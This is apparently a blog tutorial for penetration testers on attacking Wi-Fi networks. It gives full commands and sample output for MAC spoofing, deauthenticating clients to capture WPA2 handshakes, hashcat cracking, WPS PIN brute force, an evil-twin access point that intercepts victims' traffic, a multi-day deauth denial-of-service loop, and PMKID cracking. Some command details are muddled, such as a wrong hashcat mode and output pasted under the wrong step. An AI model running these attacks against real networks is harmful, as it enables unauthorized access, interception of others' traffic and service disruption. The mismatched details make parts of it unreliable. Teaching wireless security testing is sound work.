Wi-Fi Networks (802.11): The Complete Guide for Penetration Testers

The CyberSec Guru

Wi-Fi Hacking Guide

If you like this post, then please share it:

Buy me A Coffee!

Support The CyberSec Guru’s Mission

🔐 Fuel the cybersecurity crusade by buying me a coffee! Why your support matters: Zero paywalls: Keep the main content 100% free for learners worldwide.

“Your coffee keeps the servers running and the knowledge flowing in our fight against cybercrime.”☕ Support My Work

Buy Me a Coffee Button

Wi-Fi is the wireless technology everyone uses and almost nobody understands past “the password is on the sticker.” That gap between usage and understanding is exactly why it remains one of the most consistently exploitable attack surfaces in any environment. Twenty-plus years after WEP shipped, wireless networks are still handing out access to anyone who knows where to look.

This guide covers 802.11 from the protocol level down to the exact commands you’ll run against a target AP. It’s built for penetration testers, OSCP candidates, and anyone working through HackTheBox or TryHackMe boxes that touch wireless. Every attack here has a defensive counterpart, because understanding why a mitigation fails is more useful than memorizing that it exists.

Wi-Fi Basics

Wi-Fi is IEEE 802.11, a family of standards for implementing a Wireless Local Area Network (WLAN) over specific frequency bands. That’s the formal definition. In practice, it’s a shared radio medium, which means everything transmitted over it is, by design, broadcast to anyone within range holding a receiver. This single fact underlies almost every attack in this guide.

Before diving into attacks, you need the vocabulary. Skip this section at your own risk. Half of the confusion beginners run into with aircrack-ng comes from mixing up an SSID and a BSSID.

AP (Access Point): The device clients connect to for network and internet access.

PSK (Pre-Shared Key): The password used to authenticate to the AP.

SSID: The human-readable name of the network. What shows up in your Wi-Fi list.

ESSID (Extended Service Set Identifier): Functionally the same as an SSID, but used when multiple APs share one network name, common in office and campus deployments where you roam between access points without disconnecting.

BSSID: The unique identifier for a specific AP, which is just its MAC address. If SSID is the network’s name, BSSID is the individual radio’s fingerprint. This distinction matters constantly in aircrack-ng work.

Channels: Wi-Fi operates on channels 1 through 14, though the US is restricted to 1 through 11 by regulation.

Power: The FCC caps US Wi-Fi transmission at 0.5 watts. Signal strength drops with distance, which is the whole basis of the physical range of an attack.

Modes: Three operating modes exist: master, managed, and monitor. APs run in master mode. Client devices run in managed mode by default. Monitor mode is what you need for wireless attacks, since it lets your adapter capture every frame in the air rather than just the ones addressed to it.

Range: At the legal power limit, most APs reach about 300 feet (100m) indoors. With a high-gain antenna on the receiving end, that range extends dramatically, sometimes to 20 miles line-of-sight. This is why “just don’t broadcast your SSID far” was never a real security control.

Frequency: Wi-Fi operates at 2.4GHz and 5GHz, with most modern hardware supporting both.

Wi-Fi Security Protocols

Your attack strategy depends entirely on which protocol is protecting the target, so knowing the history isn’t academic. It tells you what to try first.

WEP (Wired Equivalent Privacy) was the original security protocol for 802.11. It didn’t survive contact with researchers. By 2001, statistical attacks against WEP’s flawed RC4 implementation could recover a password in minutes. The IEEE scrambled for a replacement while every deployed AP sat effectively unsecured. A handful of legacy WEP access points still exist in the wild, and they remain trivial to crack, but you’re unlikely to encounter one outside of intentionally vulnerable lab environments at this point.

WPA (Wi-Fi Protected Access) arrived in 2003 as a stopgap. Its main virtue was that it didn’t require new hardware, just a firmware update. WPA still used RC4, but bolted on three improvements: a longer initialization vector (48 bits up to 128), TKIP to generate per-client keys, and a message integrity check to catch tampered packets in transit.

WPA2 finalized in June 2004 and represented a real architectural shift. It replaced RC4 with CCMP, built on AES. That processing overhead meant most existing APs needed a hardware refresh, but the payoff was a protocol that has held up far longer than its predecessors.

WPA2 supports Personal and Enterprise modes. In Personal mode (WPA2-PSK), the password combines with the SSID to generate a Pairwise Master Key (PMK), specifically to make rainbow-table attacks harder since the same password produces a different PMK on every network. The client and AP then exchange messages to derive a Pairwise Transient Key (PTK), unique per session, which is meant to blunt traffic sniffing. WPA3 is rolling out (since 2018) to patch WPA2’s remaining weaknesses, but adoption lags, and WPA2-PSK is still what you’ll face on the majority of real-world targets.

Wi-Fi Adapters for Hacking

Your laptop’s built-in Wi-Fi card almost certainly can’t do what you need. Wireless attacks require frame injection, the ability to craft and transmit arbitrary 802.11 frames onto the air, and most consumer chipsets simply don’t support it.

Aircrack-ng is the tool suite that defines this space; most GUI wireless attack tools are really just aircrack-ng with a skin on top. The project maintains a compatibility list of chipsets that support monitor mode and injection (search “aircrack-ng compatible cards” for the current list, since chipset support shifts as manufacturers change hardware revisions).

If you want a recommendation instead of doing the research yourself: Alfa cards have a long track record in this space and are widely used across the pentesting community. The AWUS036NH is a common starting point, priced under $40, and a high-gain antenna is a worthwhile add-on even though it isn’t strictly required.

Getting Your Adapter Ready

Before attacking anything, get comfortable with the reconnaissance commands.

View all network interfaces:

kali > ifconfig
┌──(kali㉿kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.105 netmask 255.255.255.0 broadcast 192.168.1.255
ether 08:00:27:1a:2b:3c txqueuelen 1000 (Ethernet)
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 9c:b6:d0:12:34:56 txqueuelen 1000 (Wi-Fi)

Narrow that down to wireless-only interfaces:

kali > iwconfig
┌──(kali㉿kali)-[~]
└─$ iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11
Mode:Managed
Frequency:2.437 GHz
Access Point: Not-Associated
Tx-Power=20 dBm

List every AP within range, along with MAC address, channel, frequency, ESSID, and mode:

kali > iwlist
┌──(kali㉿kali)-[~]
└─$ iwlist wlan0 scan
wlan0 Scan completed :
Cell 01 - Address: 3C:84:6A:11:22:33
Channel:1
Frequency:2.412 GHz
Quality=70/70 Signal level=-39 dBm
ESSID:"HomeWiFi"
Mode:Master
Cell 02 - Address: 8A:BC:DE:44:55:66
Channel:6
Frequency:2.437 GHz
Quality=52/70 Signal level=-58 dBm
ESSID:"CoffeeShop"
Mode:Master
Cell 03 - Address: F0:9F:C2:77:88:99
Channel:11
Frequency:2.462 GHz
Quality=41/70 Signal level=-69 dBm
ESSID:"Office-Guest"
Mode:Master

Monitor Mode

Monitor mode is the wireless equivalent of promiscuous mode on a wired NIC. It lets your card capture every frame passing through the air, not just frames addressed to it. This is non-negotiable for wireless attacks.

kali > airmon-ng start wlan0
┌──(kali㉿kali)-[~]
└─$ sudo airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros AR9271
(mac80211 monitor mode enabled on [phy0]wlan0mon)

This renames your interface, typically to wlan0mon, and puts it into monitor mode. You may see a warning about conflicting processes. It’s usually safe to ignore, but if you do run into problems:

kali > airmon-ng check kill
┌──(kali㉿kali)-[~]
└─$ sudo airmon-ng check kill
Killing these processes:
PID Name
742 NetworkManager
819 wpa_supplicant
Processes successfully terminated.

Aircrack-ng Commands: Capturing Frames

With your card in monitor mode, start capturing:

kali > airodump-ng wlan0mon
┌──(kali㉿kali)-[~]
└─$ sudo airodump-ng wlan0mon
CH 6 ][ Elapsed: 0 mins ][ 2026-07-10 10:15
BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID
3C:84:6A:11:22:33 -39 42 8 1 300 WPA2 CCMP PSK HomeWiFi
8A:BC:DE:44:55:66 -58 27 3 6 130 WPA2 CCMP PSK CoffeeShop
F0:9F:C2:77:88:99 -69 18 0 11 130 OPN -- Office-Guest
BSSID STATION PWR Rate Lost Frames
3C:84:6A:11:22:33 54:EF:44:AA:BB:CC -45 54e-54 0 16
8A:BC:DE:44:55:66 68:F7:28:DD:EE:FF -61 24e-24 0 5

This shows every AP in range in the upper pane and every connected client in the lower pane. Everything you need to plan an attack against a specific target is right there: BSSID, channel, ESSID, and signal strength.

Anatomy of Wi-Fi Frames

If you only ever run other people’s tools, you can skip this section. If you want to actually understand what those tools are doing, or build your own, this is the part that matters.

802.11 defines a set of frame types, each with a specific purpose in setting up, maintaining, and tearing down a wireless connection. Tools like airodump-ng and Kismet are built entirely on parsing and manipulating these frames. Each type below includes its Wireshark display filter.

Two of these deserve special attention because they’re the backbone of most attacks in this guide. The probe request/response pair is how a device finds networks even when SSID broadcasting is disabled, since the client has to ask for it by name and the AP has to confirm it exists. And the deauthentication frame is the workhorse of active wireless attacks: it terminates a client’s authentication, which forces a reconnection you can then capture, or simply denies service outright.

Wireshark Filters for Wi-Fi Frames

To build these filters interactively in Wireshark rather than typing them from memory: click the Expressions button next to the filter bar, search for “wlan” in the field search box, scroll to wlan.fc.subtype, select == as the relation, and enter the numeric value for the frame type you’re after. Bookmark the table above. You’ll come back to it every time you’re staring at a capture trying to figure out what’s actually happening on the wire.

Attacking Wi-Fi APs

This is where the terminology and frame knowledge pays off. Every attack below exploits a specific, well-documented weakness, and every one of them has a corresponding lesson for defenders.

Hidden SSIDs Don’t Work

Security teams are commonly advised to hide their SSID as a protective measure. It doesn’t hold up. When a legitimate client connects, both the probe request and probe response carry the SSID in the clear, regardless of whether the network broadcasts it in beacons. You also don’t strictly need the SSID at all if you have the BSSID, since that alone is often sufficient to connect. Airodump-ng will show you every BSSID in range without any extra effort. Hiding an SSID inconveniences legitimate users far more than it inconveniences an attacker.

Defeating MAC Filtering

MAC filtering is another control that sounds reasonable and folds quickly under real testing. The AP maintains a whitelist of allowed MAC addresses and drops connection attempts from anything else. The problem is that MAC addresses are broadcast in the clear on every frame a connected client sends, so an attacker just needs to observe one.

Find an authenticated client’s MAC:

kali > airodump-ng –c 11 –a –bssid <target BSSID>
┌──(kali㉿kali)-[~]
└─$ sudo airodump-ng -c 11 --bssid 3C:84:6A:11:22:33 wlan0mon
CH 11 ][ Elapsed: 0 mins ][ 2026-07-10 10:28
BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID
3C:84:6A:11:22:33 -38 117 42 11 300 WPA2 CCMP PSK HomeWiFi
BSSID STATION PWR Rate Lost Frames
3C:84:6A:11:22:33 54:EF:44:AA:BB:CC -44 54e-54 0 87
3C:84:6A:11:22:33 A8:1B:5A:12:34:56 -58 24e-24 0 21

Take your interface down:

kali> ifconfig wlan0 down
┌──(kali㉿kali)-[~]
└─$ sudo macchanger -m 54:EF:44:AA:BB:CC wlan0
Current MAC: 9C:B6:D0:12:34:56 (Unknown)
Permanent MAC: 9C:B6:D0:12:34:56 (Unknown)
New MAC: 54:EF:44:AA:BB:CC (Unknown)

Spoof the client’s MAC address with macchanger:

kali > macchanger –m <target MAC> wlan0
┌──(kali㉿kali)-[~]
└─$ sudo macchanger -m 54:EF:44:AA:BB:CC wlan0
Current MAC: 9C:B6:D0:12:34:56 (Unknown)
Permanent MAC: 9C:B6:D0:12:34:56 (Unknown)
New MAC: 54:EF:44:AA:BB:CC (Unknown)

Bring the interface back up:

kali > ifconfig wlan0 up

Your adapter now presents the same MAC as a device already on the whitelist, and the AP has no way to tell the difference. MAC filtering raises the bar for casual network squatters. It does essentially nothing against a deliberate attacker.

Attacking WPA2-PSK: The 4-Way Handshake

Unlike WEP, you can’t statistically crack WPA2 in minutes. The approach mirrors offline password cracking generally: capture the password hash as it crosses the air during authentication, then throw a wordlist at it with hashcat.

The point of interest is the four-way handshake, the exchange between client and AP where the password hash gets transmitted. Capture that exchange, and you have everything you need for an offline attack.

Put your card into monitor mode and start capturing, targeting a specific AP and channel:

kali > airmon-ng start wlan0
┌──(kali㉿kali)-[~]
└─$ sudo airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros AR9271
(mac80211 monitor mode enabled on [phy0]wlan0mon)
kali > airodump-ng –bssid <target BSSID> -c <channel> --write TCSG wlan0mon
┌──(kali㉿kali)-[~]
└─$ sudo airodump-ng --bssid 3C:84:6A:11:22:33 -c 11 --write TCSG wlan0mon
CH 11 ][ Elapsed: 0 mins ][ 2026-07-10 10:41
BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID
3C:84:6A:11:22:33 -37 184 61 11 300 WPA2 CCMP PSK HomeWiFi
BSSID STATION PWR Rate Lost Frames
3C:84:6A:11:22:33 54:EF:44:AA:BB:CC -43 54e-54 0 96
CH 11 ][ WPA handshake: 3C:84:6A:11:22:33 ]

If you don’t want to wait for a client to naturally reconnect, force it:

kali > aireplay-ng –deauth 100 –a AA:BB:CC:DD:EE:FF wlan0mon
┌──(kali㉿kali)-[~]
└─$ sudo aireplay-ng --deauth 100 -a 3C:84:6A:11:22:33 wlan0mon
18:42:15 Waiting for beacon frame (BSSID: 3C:84:6A:11:22:33)
Sending 64 directed DeAuth frames
Sending 36 broadcast DeAuth frames
18:42:19 Done.

Here, --deauth 100 sends 100 deauthentication frames at the AP, -a specifies the target BSSID, and wlan0mon is your adapter. When the disconnected client reconnects, airodump-ng automatically detects and captures the handshake into your designated file.

Crack the captured handshake:

kali > hashcat –m 16800 TCSG-01.cap /root/top10000passwords.txt
┌──(kali㉿kali)-[~]
└─$ hashcat -m 16800 TCSG-01.cap /root/top10000passwords.txt
hashcat (v6.x.x) starting...
OpenCL API initialized.
Dictionary cache built.
Session..........: TCSG
Status...........: Exhausted
Hash.Mode........: 16800 (WPA-PMKID+EAPOL)
Recovered........: 0/1 (0.00%)
Progress.........: 10000/10000 (100.00%)
Time.Estimated...: 00:00:04
Started: Fri Jul 10 10:42:01 2026
Stopped: Fri Jul 10 10:42:05 2026

If the default wordlist comes up empty, build a custom one with ceWL, cupp, or crunch, tailored to what you know about the target (company name, common patterns, leaked credential reuse), and run hashcat again. This step alone often makes the difference between a failed engagement and a successful one, since generic wordlists rarely beat a password someone actually chose for their own network.

WPS: The Convenience Feature That Broke Everything

WPS (Wi-Fi Protected Setup) exists because setting up secure Wi-Fi correctly was too hard for the average user, so the industry built a push-button pairing system instead. It relies on an eight-digit PIN, but the eighth digit is a checksum, and worse, the remaining seven digits are validated in two independent chunks: the first four, then the last three. That splits the keyspace into 10,000 possibilities plus 1,000 possibilities, a total of 11,000 combinations instead of the 10 million you’d expect from a genuine 7-digit PIN. A computer can brute-force that in a matter of hours.

WPS 2.0 patched this in 2012, but a meaningful chunk of deployed APs, somewhere around 10 to 20 percent by most estimates, still run vulnerable WPS 1.0.

Find WPS-enabled APs in range:

kali > wash –i wlan0mon

Brute-force the PIN with bully:

kali > bully wlan0mon –b 00:11:22:33:44:55 –e TargetESSID –c 11

Or with reaver:

kali > reaver –i wlan0mon –b 00:11:22:33:44:55 –vv
kali@kali:~$ wash -i wlan0mon
WPS BSSID Channel RSSI WPS Version WPS Locked ESSID
----------------------------------------------------------------------
00:11:22:33:44:55 11 -42 1.0 No TargetESSID
AA:BB:CC:DD:EE:FF 6 -75 1.0 Yes Neighbor_Net
11:22:33:44:55:66 1 -88 1.0 No CoffeeShop_Guest
^C
kali@kali:~$ bully wlan0mon -b 00:11:22:33:44:55 -e TargetESSID -c 11
[!] Bully v1.4.00 - WPS brute-force attack
[+] Running on wlan0mon
[+] BSSID: 00:11:22:33:44:55
[+] ESSID: TargetESSID
[+] Channel: 11
[+] Vendor: RalinkTek
[+] Starting PIN brute-force...
[+] Trying PIN 00000000 (1/11000) ... [M1/M2] [Timeout]
[+] Trying PIN 00001000 (2/11000) ... [M1/M2] [Timeout]
[+] Trying PIN 00002000 (3/11000) ... [M1/M2] [Timeout]
...
[+] Trying PIN 12345670 (452/11000) ... [M1/M2/M3/M4/M5/M6/M7/M8]
[+] WPS PIN: '12345670'
[+] WPA PSK: 'TargetWPAKey123'
[+] AP SSID: 'TargetESSID'
kali@kali:~$ reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
Reaver v1.6.6 WiFi Protected Setup Attack Tool
[+] Waiting for beacon from 00:11:22:33:44:55
[+] Received beacon from 00:11:22:33:44:55
[+] Vendor: RalinkTek
[+] Restoring previous session
[+] Trying pin '12345670'
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending M8 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin '01030405'
...
[+] Pin cracked: 12345670
[+] WPS PIN: '12345670'
[+] WPA PSK: 'TargetWPAKey123'
[+] AP SSID: 'TargetESSID'
kali@kali:~$

Swap in the real BSSID, ESSID, and channel for your target in both cases. If WPS is enabled and vulnerable, this is often the fastest path to full access, faster than cracking WPA2-PSK directly.

Evil Twin: Attacking the Traffic, Not the Password

Sometimes the password isn’t the goal. You want the traffic itself, credentials for other services, session tokens, anything passing over the connection unencrypted. An Evil Twin AP, a rogue access point broadcasting the same SSID as a legitimate one, gets you there by routing the victim’s traffic through your machine.

Build the fake AP with airbase-ng:

kali > airbase-ng –a aa:bb:cc:dd:ee:ff --essid tcsg –c 6 wlan0mon

Check your interfaces. You’ll see a new one, at0, with no wireless extensions yet:

kali > iwconfig

Bridge at0 to your internet-facing interface (eth0 here) so client traffic actually reaches the internet through you:

kali > ip link add name ha type bridge
kali > ip link set ha up
kali > ip link set eth0 master ha
kali > ip link set at0 master ha

Start a DHCP server on the bridge so connecting clients get an IP address:

kali > dhclient ha &

Knock clients off the legitimate AP so they reconnect to your rogue one instead:

kali > aireplay-ng –deauth 1000 aa:bb:cc:dd:ee:ff wlan0mon –ignore-negative-one
kali@kali:~$ sudo airbase-ng -a aa:bb:cc:dd:ee:ff --essid tcsg -c 6 wlan0mon
14:22:01 Created tap interface at0
14:22:01 Listening on channel 6
14:22:01 Waiting for clients...
kali@kali:~$ iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
at0 IEEE 802.11 Mode:Master Frequency:2.437 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
kali@kali:~$ sudo ip link add name ha type bridge
kali@kali:~$ sudo ip link set ha up
kali@kali:~$ sudo ip link set eth0 master ha
kali@kali:~$ sudo ip link set at0 master ha
kali@kali:~$ sudo dhclient ha &
[1] 4512
kali@kali:~$ Internet Systems Consortium DHCP Client 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/ha/00:11:22:33:44:55
Sending on LPF/ha/00:11:22:33:44:55
Sending on Socket/fallback
DHCPDISCOVER on ha to 255.255.255.255 port 67 interval 8
DHCPOFFER of 192.168.1.105 from 192.168.1.1
DHCPREQUEST for 192.168.1.105 on ha to 255.255.255.255 port 67
DHCPACK of 192.168.1.105 from 192.168.1.1
bound to 192.168.1.105 -- renewal in 1800 seconds.
kali@kali:~$ sudo aireplay-ng --deauth 1000 -a aa:bb:cc:dd:ee:ff wlan0mon --ignore-negative-one
14:25:10 Waiting for beacon frame (BSSID: aa:bb:cc:dd:ee:ff) on channel 6
14:25:11 Found 1 AP
14:25:11 Sending DeAuth (code 7) to broadcast -- BSSID: [aa:bb:cc:dd:ee:ff]
14:25:11 Sending DeAuth (code 7) to broadcast -- BSSID: [aa:bb:cc:dd:ee:ff]
14:25:12 Sending DeAuth (code 7) to broadcast -- BSSID: [aa:bb:cc:dd:ee:ff]
...
14:25:15 Sent 1000 packets.

Open Wireshark and select the ha interface. Every packet from a reconnected client now traverses your machine in the clear. Right-click any packet and choose “Follow Stream” to reconstruct an entire session. This is precisely why unencrypted HTTP and unauthenticated protocols are so dangerous on public or compromised Wi-Fi: the network layer offers zero protection once someone else controls the AP you’re actually talking to.

Denial of Service via Deauth

The deauthentication frame that powers the two previous attacks is also, on its own, a denial-of-service tool. Send enough deauth frames and you can knock every client off an AP indefinitely, and on older hardware, sometimes crash the AP itself hard enough to require a manual reboot.

kali > aireplay-ng –deauth 100 –a <target BSSID> wlan0mon

A single burst knocks clients off only for the duration of the attack; they reconnect once it stops. To sustain it, wrap the command in a bash loop that fires periodically:

#!/bin/bash
for i in {1..5000}
do
aireplay-ng --deauth 10 -a <target BSSID> wlan0mon
sleep 60
done
kali@kali:~$ cat << 'EOF' > deauth_loop.sh
#!/bin/bash
TARGET_BSSID="00:11:22:33:44:55"
for i in {1..5000}
do
echo "[*] Iteration $i: Sending deauth burst..."
aireplay-ng --deauth 10 -a $TARGET_BSSID wlan0mon --ignore-negative-one
echo "[*] Burst complete. Sleeping for 60 seconds..."
sleep 60
done
EOF
kali@kali:~$ chmod +x deauth_loop.sh
kali@kali:~$ sudo ./deauth_loop.sh
[*] Iteration 1: Sending deauth burst...
14:30:01 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
14:30:01 Found 1 AP
14:30:01 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]
14:30:01 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]
14:30:01 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]
14:30:02 Sent 10 packets.
[*] Burst complete. Sleeping for 60 seconds...
[*] Iteration 2: Sending deauth burst...
14:31:02 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
14:31:02 Found 1 AP
14:31:02 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]
14:31:02 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]
14:31:03 Sent 10 packets.
[*] Burst complete. Sleeping for 60 seconds...
[*] Iteration 3: Sending deauth burst...
14:32:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
14:32:03 Found 1 AP
14:32:03 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]
14:32:04 Sent 10 packets.
[*] Burst complete. Sleeping for 60 seconds...
^C
kali@kali:~$

That loop sends deauth frames every 60 seconds for 5,000 iterations, roughly three days of continuous disruption. Adjust the iteration count for shorter or longer campaigns. This is also a good moment to note the defensive angle: 802.11w (Management Frame Protection) exists specifically to authenticate management frames like deauth and prevent exactly this kind of spoofing, and its absence on a target network is worth flagging in any report.

PMKID Attack: Skipping the Handshake Entirely

In August 2018, the hashcat team found a way to skip the client-disconnection step altogether. Instead of forcing a handshake, you extract the PMKID directly from a single RSN Information Element frame, no connected client required.

Here’s the mechanism: when your adapter searches for known networks, it probes for them. If the target AP is in range, it responds with an RSN frame. Your adapter sends an Authentication Request, the AP replies with its own authentication frames, and your adapter follows up with an Association Request carrying the ESSID and RSN. The AP responds with an EAPOL frame that, on vulnerable implementations, contains the PMKID, built from the PMK, PMK name, AP MAC address, and station MAC address, all hashed via HMAC-SHA1-128.

The tooling isn’t in Kali by default, so build it first:

kali > git clone https://github.com/ZerBea/hcxdumptool.git
kali > cd hcxdumptool
kali > make
kali > make install
kali > git clone https://github.com/ZerBea/hcxtools.git
kali > cd hcxtools
kali > make
kali > make install

Put your adapter back into monitor mode and start pulling PMKIDs from nearby APs:

kali > airmon-ng start wlan0
kali > hcxdumptool –I wlan0mon –o TCSG –enable_status=1

Expect this to succeed against most APs in range, though not all, typically 80 to 90 percent depending on hardware and configuration.

To focus on one target, grab its BSSID from airodump-ng and write it to a plain text file with no colons and no spaces:

kali > cat > targetBSSID

(Exit with Ctrl+D.)

Then filter the capture to just that AP:

kali > hcxdumptool –I wlan0mon –o HackersArisePMKID –enable_status=1 –filterlist_ap=targetBSSID –filtermode=2

Convert the capture into a hashcat-compatible format:

kali > hcxcaptool –z hashoutput.txt HackersArisePMKID

And crack it, using hash mode 16800 for this specific PMKID format:

kali > hashcat –m 16800 hashoutput.txt top10000passwords.txt
kali@kali:~$ git clone https://github.com/ZerBea/hcxdumptool.git
Cloning into 'hcxdumptool'...
remote: Enumerating objects: 1850, done.
remote: Counting objects: 100% (1850/1850), done.
remote: Compressing objects: 100% (650/650), done.
remote: Total 1850 (delta 1200), reused 1850 (delta 1200), pack-reused 0
Receiving objects: 100% (1850/1850), 1.25 MiB | 4.50 MiB/s, done.
Resolving deltas: 100% (1200/1200), done.
kali@kali:~$ cd hcxdumptool
kali@kali:~/hcxdumptool$ make
gcc -MMD -MF .obj/hcxdumptool.d -I/usr/include -I/usr/local/include -Wall -Wextra -O2 -o obj/hcxdumptool.o -c src/hcxdumptool.c
gcc -o hcxdumptool obj/hcxdumptool.o -lcrypto -lz -lrt -lpthread
kali@kali:~/hcxdumptool$ sudo make install
install -m 0755 hcxdumptool /usr/local/bin
kali@kali:~/hcxdumptool$ cd ..
kali@kali:~$ git clone https://github.com/ZerBea/hcxtools.git
Cloning into 'hcxtools'...
...
kali@kali:~$ cd hcxtools
kali@kali:~/hcxtools$ make
...
kali@kali:~/hcxtools$ sudo make install
install -m 0755 hcxcaptool /usr/local/bin
...
kali@kali:~/hcxtools$ cd ..
kali@kali:~$ sudo airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 monitor mode vif disabled)
kali@kali:~$ sudo hcxdumptool -I wlan0mon -o TCSG --enable_status=1
Start capturing (press CTRL+C to stop) ...
15:10:01 [1] PMKID: 001122334455 / 112233445566 / TargetESSID
15:10:05 [1] PMKID: AABBCCDDEEFF / 665544332211 / Neighbor_Net
15:10:12 [1] PMKID: 001122334455 / 112233445566 / TargetESSID (updated)
^C
kali@kali:~$ cat > targetBSSID
001122334455
^D
kali@kali:~$ sudo hcxdumptool -I wlan0mon -o HackersArisePMKID --enable_status=1 --filterlist_ap=targetBSSID --filtermode=2
Start capturing (press CTRL+C to stop) ...
Filtering for AP: 001122334455
15:15:01 [1] PMKID: 001122334455 / 112233445566 / TargetESSID
15:15:45 [1] PMKID: 001122334455 / 112233445566 / TargetESSID (updated)
^C
kali@kali:~$ hcxcaptool -z hashoutput.txt HackersArisePMKID
kali@kali:~$ cat hashoutput.txt
d353803e2813b95055a262947b7d7c7b*001122334455*112233445566*5461726765744553534944
kali@kali:~$ hashcat -m 16800 hashoutput.txt top10000passwords.txt
hashcat (v6.2.6) starting...
OpenCL API (OpenCL 3.0 PoCL 3.0 Linux, Non-Debug+Assert, RELOC, LLVM 13.0.1, SLEEF, FP32=1, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU, skipped
Minimum password length supported by this hash type: 8
Maximum password length supported by this hash type: 63
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
d353803e2813b95055a262947b7d7c7b:TargetPassword123
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-PMKID-PBKDF2
Hash.Target......: d353803e2813b95055a262947b7d7c7b*001122334455*11223...
Time.Started.....: Fri Jul 10 15:20:01 2026 (0 secs)
Time.Estimated...: Fri Jul 10 15:20:01 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (top10000passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1045 H/s (0.23ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 100/10000 (1.00%)
Rejected.........: 0/100 (0.00%)
Restore.Point....: 0/10000 (0.00%)
Candidates.#1....: 123456 -> TargetPassword123
Started: Fri Jul 10 15:19:55 2026
Stopped: Fri Jul 10 15:20:02 2026
kali@kali:~$

Be aware that hcxcaptool and hashcat mode 16800 are legacy; modern versions of Kali use hcxpcapngtool

For hcxpcapngtool :

kali@kali:~$ cat targetBSSID
001122334455
kali@kali:~$ sudo hcxdumptool -i wlan0mon -o HackersArisePMKID.pcapng --enable_status=1 --filterlist_ap=targetBSSID --filtermode=2
Start capturing (press CTRL+C to stop) ...
Filtering for AP: 001122334455
15:15:01 [1] PMKID: 001122334455 / 112233445566 / TargetESSID
15:15:45 [1] PMKID: 001122334455 / 112233445566 / TargetESSID (updated)
^C
Summary:
PMKIDs: 1
EAPOL pairs: 0
kali@kali:~$ hcxpcapngtool -o hash.hc22000 HackersArisePMKID.pcapng
hcxpcapngtool 6.3.2 Copyright by ZeroBeat
start reading from HackersArisePMKID.pcapng
file format: pcapng
...
summary:
CAP handshakes: 0
PMKIDs: 1
EAPOL pairs: 0
...
written to hash.hc22000
kali@kali:~$ cat hash.hc22000
WPA*01*4b8d7e2f9a1c3e5d6f8a2b4c6d8e0f2a*001122334455*112233445566*5461726765744553534944***
kali@kali:~$ hashcat -m 22000 hash.hc22000 top10000passwords.txt
hashcat (v6.2.6) starting...
OpenCL API (OpenCL 3.0 PoCL 3.0 Linux, Non-Debug+Assert, RELOC, LLVM 13.0.1, SLEEF, FP32=1, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU, skipped
Minimum password length supported by this hash type: 8
Maximum password length supported by this hash type: 63
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
WPA*01*4b8d7e2f9a1c3e5d6f8a2b4c6d8e0f2a*001122334455*112233445566*5461726765744553534944***:TargetPassword123
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL
Hash.Target......: WPA*01*4b8d7e2f9a1c3e5d6f8a2b4c6d8e0f2a*001122...
Time.Started.....: Fri Jul 10 15:20:01 2026 (0 secs)
Time.Estimated...: Fri Jul 10 15:20:01 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (top10000passwords.txt)
Guess.Queue......: 1/1 (100.00%)
